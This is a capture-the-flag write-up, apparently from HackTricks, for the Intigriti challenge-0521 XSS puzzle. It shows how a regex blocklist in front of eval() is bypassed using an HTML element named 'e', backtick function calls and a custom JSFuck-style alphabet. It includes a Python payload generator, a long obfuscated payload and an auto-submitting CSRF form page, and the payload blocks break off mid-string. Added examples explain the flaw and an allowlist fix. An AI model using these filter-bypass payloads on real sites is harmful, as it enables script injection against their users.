# challenge-0521.intigriti.io

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? Or do you want to have access to the **latest version of PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>
### Brief Description <a href="#brief-description" id="brief-description"></a>

The challenge provides a form vulnerable to XSS at the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php).\
The form is loaded through an iframe in [https://challenge-0521.intigriti.io/](https://challenge-0521.intigriti.io).

It was found that the form inserts the user input into the JavaScript `eval` function. This is generally bad practice because it can lead to arbitrary JavaScript execution, and this challenge is a good example of that.\
However, before the user input is inserted into `eval`, it is checked with the regular expression `/[a-df-z<>()!\\='"]/gi`, so if any of those characters is found the input is not executed in `eval`.\
Nevertheless, a way was found to bypass the regex protection and execute `alert(document.domain)` by abusing the dangerous `eval` function.
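The filter-then-`eval` pattern described above, shown as an added example in Node (this is neither the challenge's source nor code from the write-up): the blocklist-protected `eval` beside an allowlist check that never evaluates user input, plus an audit helper that lists what the blocklist still lets through. The regex is the one quoted on the page; the function names and the assumption that the captcha expects a plain numeric answer are assumptions made for this example.

```javascript
// Added illustration of the filter-then-eval pattern the write-up describes.
// The regex is the one quoted on the page; the function names and the idea that
// the captcha expects a plain numeric answer are assumptions for this example.
const FORBIDDEN = /[a-df-z<>()!\\='"]/gi;

// Unsafe variant: a blocklist is applied and whatever survives reaches eval().
// Returns the evaluated value, or null when the blocklist rejected the input.
function evalIfAllowed(userInput) {
  FORBIDDEN.lastIndex = 0;          // a /g regex keeps state between test() calls
  if (FORBIDDEN.test(userInput)) {
    return null;
  }
  return eval(userInput);           // arbitrary code execution for anything the blocklist misses
}

// Audit helper: which printable ASCII characters does the blocklist let through?
// The result (digits, e, E, and punctuation such as [ ] $ { } + / and the backtick)
// is the raw material the write-up builds its payload from, which is why a
// blocklist is the wrong tool here.
function allowedPrintableAscii() {
  let allowed = '';
  for (let code = 0x20; code < 0x7f; code++) {
    const ch = String.fromCharCode(code);
    FORBIDDEN.lastIndex = 0;
    if (!FORBIDDEN.test(ch)) allowed += ch;
  }
  return allowed;
}

// Safe variant: an allowlist. The answer must be an integer; it is parsed, never evaluated.
// Returns the number, or null if the input is anything else.
function parseCaptchaAnswer(userInput) {
  if (!/^-?\d{1,9}$/.test(userInput)) return null;
  return Number(userInput);
}
```

`allowedPrintableAscii()` returns the 36 characters the regex never rejects; every character of the final payload in this write-up is drawn from that set. The allowlist version accepts only what a captcha answer can legitimately be, so there is nothing left for `eval` to run.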
### Accessing the HTML <a href="#accessing-the-html" id="accessing-the-html"></a>

It was found that the user is allowed to input the letter `e`. It was also found that there is an HTML element with `id="e"`. Therefore, this HTML element can be accessed from JavaScript through the variable `e`:

![](https://i.imgur.com/Slq2Xal.png)

Moreover, it is important to know that in JS the properties of an object can be accessed either with a dot or with a string inside square brackets. Therefore, the `domain` property of the `document` object can be accessed in either of these ways:

```javascript
document.domain
document["domain"]
```

The same applies to properties that are functions (methods):

```javascript
document.write("1")
document["write"]("1")
```

Then, the `document` object can be reached from the `e` HTML element with something like:

```javascript
e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]
```

### Calling functions without parentheses with JS code as a string

From the `document` object it is possible to call the `write` function to **write arbitrary HTML text that the browser will execute**.\
However, as the `()` characters are **forbidden**, they cannot be used to call functions. Nevertheless, functions can be called using **backticks** (\`\`).\
Moreover, the javascript code to execute can be placed as a string inside `${...}`.

```javascript
`${"alert(document.location)"}`
```

Therefore, combining the `document` object access with this technique, a function can be executed without using parentheses, and the alert can be triggered:

```javascript
e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]`${"<script>alert(document.location)</script>"}`
```

You can test this code in the javascript console of the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php).
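How tagging a function with a template literal (the backtick form used above) actually invokes it, as an added example that runs in Node rather than in a browser and is not code from the write-up: `inspectTag` stands in for any function so the arguments can be inspected, and `joinLikeDocumentWrite` stands in for a sink that, like `document.write`, concatenates all of its arguments. Both names are assumptions for this example.

```javascript
// Added illustration of how a tagged template literal calls a function without parentheses.
// Node-only stand-ins are used instead of the DOM; the names are assumptions.

// A tag function receives the literal's fixed string pieces first and then every ${} value.
function inspectTag(strings, ...values) {
  return { strings: Array.from(strings), values };
}

// Stand-in for a sink that, like document.write, concatenates all of its arguments.
function joinLikeDocumentWrite(...args) {
  return args.map(String).join('');
}

// The tagged form and the explicit call deliver the same arguments to the sink.
function callWithoutParens() {
  return {
    tagged: inspectTag`${'payload'}`,                        // strings: ["", ""], values: ["payload"]
    viaSink: joinLikeDocumentWrite`${'<b>hi</b>'}`,          // ",<b>hi</b>" (["", ""] coerces to ",")
    explicit: joinLikeDocumentWrite(['', ''], '<b>hi</b>'),  // identical result
  };
}

// Filtering view: once "(" and ")" are blocked, a backtick together with "${" is
// what keeps a function call reachable; a filter that ignores them is incomplete.
function containsTaggedTemplateCall(input) {
  return input.includes('`') && input.includes('${');
}
```

The tag function is called with the array of literal string pieces first (here `["", ""]`, which coerces to `","`) and each `${}` value afterwards, so a concatenating sink still receives the interpolated string; that is why the write-up's `write` call works with no `(` or `)` at all. The leading comma is harmless to the browser's HTML parser, which is why it does not show up in the write-up's result.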
### Final forbidden characters bypass <a href="#final-forbidden-characters-bypass" id="final-forbidden-characters-bypass"></a>

However, there is still a problem. Most of the characters of the exploit are **forbidden** because they appear in the regex `/[a-df-z<>()!\\='"]/gi`. But note that all the **forbidden characters are inside strings** of the exploit, while the **non-string characters of the exploit (e\[]\`${}) are allowed**.\
This means that, if it is possible to **generate the strings of the forbidden characters from the allowed ones**, the exploit can be generated.\
To do so, I generated an alphabet similar to the one of [JSFuck](http://www.jsfuck.com) to produce the needed characters (_this alphabet is custom for this challenge_).\
You can **see the complete alphabet in the exploit code** (in the next subsection and in the file _exploit.txt_).

For example, in order to **generate the letter `a`** it is possible to access **`[[]/e+e][0][1]`**, as `[[]/e+e][0]` generates the string `"NaN[object HTMLProgressElement]"`; or, in order to generate the **letter `f`**, it is possible to access the 5th character of **`[[][[]]+e][0]`**, as that expression generates the string `"undefined[object HTMLProgressElement]"`.\
Using these tricks and some more complex ones, it was possible to **generate strings for all the characters (letters and symbols) contained in the exploit**:

```javascript
e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]`${"<script>alert(document.location)</script>"}`
```
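The coercions behind the direct alphabet, re-evaluated outside a browser as an added example (not code from the write-up): `e` is a stand-in object whose string form is `"[object HTMLProgressElement]"`, the value the page reports for the real element, and `mismatchedEntries` checks every entry of the page's direct table against the strings those expressions produce. The stand-in object and the helper names are assumptions; the table itself is copied from the Python code below.

```javascript
// Added example: re-evaluates the coercions behind the write-up's direct alphabet
// outside a browser. Node has no DOM, so `e` is a stand-in object whose string form
// is "[object HTMLProgressElement]", the value the page reports for the real element.
// The stand-in and the helper names are assumptions; the table is copied from the page.
const e = { [Symbol.toStringTag]: 'HTMLProgressElement' };

// The four source strings the table indexes into, built with the page's own expressions.
function sourceStrings(el) {
  return {
    '[e+e][0]': [el + el][0],           // "[object HTMLProgressElement][object HTMLProgressElement]"
    '[[]/e+e][0]': [[] / el + el][0],   // "NaN[object HTMLProgressElement]" ([] -> 0, 0 / NaN -> NaN)
    '[[][[]]+e][0]': [[][[]] + el][0],  // "undefined[object HTMLProgressElement]" ([][""] is undefined)
    '[/e/+e][0]': [/e/ + el][0],        // "/e/[object HTMLProgressElement]" (RegExp toString)
  };
}

// Resolve an expression of the form <source>[<index>] to the character it selects;
// null for anything outside that shape or out of range.
function resolveEntry(expr, el) {
  const sources = sourceStrings(el);
  const m = /^(.*\]\[0\])\[(\d+)\]$/.exec(expr);
  if (!m || !(m[1] in sources)) return null;
  const ch = sources[m[1]][Number(m[2])];
  return ch === undefined ? null : ch;
}

// The page's direct alphabet (single-character entries are literals the filter allows as-is).
const DIRECT_ALPHABET = {
  '1': '1', '.': '.',
  '[': '[e+e][0][0]', ']': '[e+e][0][27]', '/': '[/e/+e][0][0]',
  'a': '[[]/e+e][0][1]', 'b': '[e+e][0][2]', 'c': '[e+e][0][5]', 'd': '[[][[]]+e][0][2]',
  'e': '[e+e][0][4]', 'f': '[[][[]]+e][0][4]', 'g': '[e+e][0][15]', 'H': '[e+e][0][8]',
  'i': '[[][[]]+e][0][5]', 'j': '[e+e][0][3]', 'L': '[e+e][0][11]', 'l': '[e+e][0][21]',
  'M': '[e+e][0][10]', 'n': '[[][[]]+e][0][1]', 'N': '[[]/e+e][0][0]', 'o': '[e+e][0][1]',
  'r': '[e+e][0][13]', 's': '[e+e][0][18]', 't': '[e+e][0][6]', 'T': '[e+e][0][9]',
  'u': '[[][[]]+e][0][0]',
};

// Entries whose expression does not evaluate to the character they claim (empty when the table is right).
function mismatchedEntries(table, el) {
  const bad = [];
  for (const [want, expr] of Object.entries(table)) {
    if (expr === want) continue;                // literal character, nothing to evaluate
    const got = resolveEntry(expr, el);
    if (got !== want) bad.push({ want, expr, got });
  }
  return bad;
}
```

The dependent alphabet (the `outerHTML`, `parentNode` and `children` chains in the Python code) indexes into markup of the real page, so it cannot be checked without the DOM; only the four coercion-based sources are reproduced here. The defensive reading is that a blocklist which leaves `+`, `/`, `[` and `]` available also leaves implicit string conversion available, and with it every character that appears in an object's default string form.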

### Exploit Code <a href="#exploit-code" id="exploit-code"></a>

This is the Python exploit code used to generate the final exploit. If you execute it, it will print the exploit:

```python
#JS Specific Direct Alphabet
x = {
    "1": "1",
    ".": ".",
    "[": "[e+e][0][0]",
    "]": "[e+e][0][27]",
    "/": "[/e/+e][0][0]",
    "a": "[[]/e+e][0][1]",
    "b": "[e+e][0][2]",
    "c": "[e+e][0][5]",
    "d": "[[][[]]+e][0][2]",
    "e": "[e+e][0][4]",
    "f": "[[][[]]+e][0][4]",
    "g": "[e+e][0][15]",
    "H": "[e+e][0][8]",
    "i": "[[][[]]+e][0][5]",
    "j": "[e+e][0][3]",
    "L": "[e+e][0][11]",
    "l": "[e+e][0][21]",
    "M": "[e+e][0][10]",
    "n": "[[][[]]+e][0][1]",
    "N": "[[]/e+e][0][0]",
    "o": "[e+e][0][1]",
    "r": "[e+e][0][13]",
    "s": "[e+e][0][18]",
    "t": "[e+e][0][6]",
    "T": "[e+e][0][9]",
    "u": "[[][[]]+e][0][0]",
}
#JS Dependent Alphabet
#The following alphabet will use previously obtained characters
#Note that this way of getting the characters is custom for the abused HTML
outerHTML = '+'.join(x[k] for k in 'outerHTML')
x['p'] = f'e[{outerHTML}][1]'
x['y'] = f'e[{outerHTML}][39]'
x['<'] = f'e[{outerHTML}][0]'
x['>'] = f'e[{outerHTML}][62]'
x['"'] = f'e[{outerHTML}][13]'
parentNode = '+'.join(x[k] for k in 'parentNode')
document = f'e[{parentNode}][{parentNode}][{parentNode}][{parentNode}][{parentNode}]'
x['h'] = f'e[{parentNode}][{parentNode}][{outerHTML}][15]'
children = '+'.join(x[k] for k in 'children')
captcha = '+'.join(x[k] for k in 'captcha')
x['w'] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][35]'
write = '+'.join(x[k] for k in 'write')
x['m'] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][38]'
x['('] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][42]'
x[')'] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][43]'
# Exploit generation: every character of the payload is replaced by its alphabet expression
payload_text = '<script>alert(document["domain"])</script>'
payload = '+'.join(x[k] for k in payload_text)
txt = f'{document}[{write}]'+'`${['+payload+']}`'
print(txt) #Write the exploit to stdout
```

### Exploitation <a href="#exploitation" id="exploitation"></a>

To generate the exploit just execute the Python code above. If you prefer, you can also copy/paste it from here:

```
e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][5]+
e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[][[]]+e][0][5]+[e+e][0][21]+[[][[]]+e][0][2]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]][[e+e][0][5]+[[]/e+e][0][1]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[]/e+e][0][1]][[e+e][0][15]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][35]+[e+e][0][13]+[[][[]]+e][0][5]+[e+e][0][6]+[e+e][0][4]]`${[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][0]+[e+e][0][18]+[e+e][0][5]+[e+e][0][13]+[[][[]]+e][0][5]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0]
[11]][1]+[e+e][0][6]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][
```
Then, you need to **generate an HTML page** that, when loaded, will **redirect** the victim to the **challenge** page and **set the exploit** in the captcha form. This can be done with the following code (_note that the exploit is URL-encoded_):

```markup
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://challenge-0521.intigriti.io/captcha.php" method="POST">
<input type="hidden" name="c" value="e&#91;e&#91;&#91;e&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;&#91;&#93;&#91;&#91;&#93;&#93;&#43;e&#93;&#91;0&#93;&#91;0&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;6&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;4&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;13&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;8&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;9&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;10&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;11&#93;&#93;&#91;1&#93;&#43;&#91;&#91;&#93;&#47;e&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;13&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;4&#93;&#43;&#91;&#91;&#93;&#91;&#91;&#93;&#93;&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;6&#93;&#43;&#91;&#91;&#93;&#47;e&#43;e&#93;&#91;0&#93;&#91;0&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;&#91;&#93;&#91;&#91;&#93;&#93;&#43;e&#93;&#91;0&#93;&#91;2&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;4&#93;&#93;&#91;e&#91;&#91;e&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;&#91;&#93;&#91;&#91;&#93;&#93;&#43;e&#93;&#91;0&#93;&#91;0&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;6&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;4&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;13&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;8&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;9&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;10&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;11&#93;&#93;&#91;1&#93;&#43;&#91;&#91;&#93;&#47;e&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;13&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;4&#93;&#43;&#91;&#91;&#93;&#91;&#91;&#93;&#93;&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;6&#93;&#43;&#91;&#91;&#93;&#47;e&#43;e&#93;&#91;0&#93;&#91;0&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;&#91;&#93;&#91;&#91;&#93;&#93;&#43;e&#93;&#91;0&#93;&#91;2&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;4&#93;&#93;&#91;e&#91;&#91;e&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;&#91;&#93;&#91;&#91;&#
93;&#93;&#43;e&#93;&#91;0&#93;&#91;0&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;6&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;4&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;13&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;8&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;9&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;10&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;11&#93;&#93;&#91;1&#93;&#43;&#91;&#91;&#93;&#47;e&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;13&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;4&#93;&#43;&#91;&#91;&#93;&#91;&#91;&#93;&#93;&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;6&#93;&#43;&#91;&#91;&#93;&#47;e&#43;e&#93;&#91;0&#93;&#91;0&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;&#91;&#93;&#91;&#91;&#93;&#93;&#43;e&#93;&#91;0&#93;&#91;2&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;4&#93;&#93;&#91;e&#91;&#91;e&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;&#91;&#93;&#91;&#91;&#93;&#93;&#43;e&#93;&#91;0&#93;&#91;0&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;6&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;4&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;13&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;8&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;9&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;10&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;11&#93;&#93;&#91;1&#93;&#43;&#91;&#91;&#93;&#47;e&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;13&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;4&#93;&#43;&#91;&#91;&#93;&#91;&#91;&#93;&#93;&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;6&#93;&#43;&#91;&#91;&#93;&#47;e&#43;e&#93;&#91;0&#93;&#91;0&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;&#91;&#93;&#91;&#91;&#93;&#93;&#43;e&#93;&#91;0&#93;&#91;2&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;4&#93;&#93;&#91;e&#91;&#91;e&#43;e&#93;&#91;0&#93;&#91;1&#93;&#43;&#91;&#91;&#93;&#91;&#91;&#93;&#93;&#43;e&#93;&#91;0&#93;&#91;0&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;6&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#
91;4&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;13&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;8&#
<input type="submit" value="提交请求" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```

Finally, serve the PoC on an HTTP server and access it from the browser:\

![](https://i.imgur.com/qack7GO.png)

Just press **submit** in the captcha form and the alert will be executed:

![](https://i.imgur.com/mCORty3.png)